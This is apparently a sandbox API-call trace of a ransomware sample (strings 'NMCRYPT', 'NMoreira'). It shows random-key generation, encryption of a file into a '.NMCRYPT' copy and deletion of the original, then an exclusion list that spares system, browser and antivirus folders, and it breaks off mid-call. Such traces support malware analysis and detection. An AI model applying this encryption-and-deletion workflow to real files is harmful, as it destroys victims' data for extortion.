[0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.577] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.578] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.578] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0163.578] CryptHashData (hHash=0x9ad478, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.578] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad178) returned 1 [0163.578] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0163.578] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0163.578] wcslen (_String="\\\\?\\") returned 0x4 [0163.578] CryptDuplicateKey (in: hKey=0x9ad178, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad2b8) returned 1 [0163.578] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0163.578] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0163.579] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=235) returned 1 [0163.579] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0163.579] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0xeb, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0xeb, lpOverlapped=0x0) returned 1 [0163.580] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xeb, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xf0) returned 1 [0163.580] GetLastError () returned 0x0 [0163.580] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0xf0, lpOverlapped=0x0) returned 1 [0163.839] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0163.839] WriteFile (in: hFile=0x588, lpBuffer=0x2974d38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0163.839] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm")) returned 0x20 [0163.839] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm", dwFileAttributes=0x20) returned 0 [0163.840] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 1 [0163.840] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm")) returned 0 [0163.840] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" [0163.840] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0163.840] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF36B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf36b.tmp")) returned 0xf36b [0163.845] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF36B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf36b.tmp"), dwFlags=0x1) returned 0 [0163.846] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF36B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf36b.tmp")) returned 1 [0163.846] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0163.846] wcslen (_String="OK") returned 0x2 [0163.846] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.846] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.846] CryptDestroyKey (hKey=0x9ad178) returned 1 [0163.846] CryptDestroyHash (hHash=0x9ad478) returned 1 [0163.846] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0163.846] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0163.846] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*NMCRYPT") returned 0 [0163.846] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*Recovers your files.html") returned 0 [0163.846] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*.exe") returned 0 [0163.846] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*.dll") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*.lnk") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*.bat") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*.ini") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*.msi") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*.scf") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*pagefile.sys*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*AppData*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*\\winrar\\*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*\\java\\*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*\\windows\\*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*\\ESET\\*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*\\AVG\\*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*Atheros*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*Realtek*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*bootmgr*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*boot*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*boot*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*IO.SYS*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*ntldr*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*chrome*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*opera*") returned 0 [0163.847] PathMatchSpecW (pszFile="HandPrints.jpg", pszSpec="*firefox*") returned 0 [0163.847] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg", pszSpec="*") returned 1 [0163.847] strlen (_Str="NMoreira") returned 0x8 [0163.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | 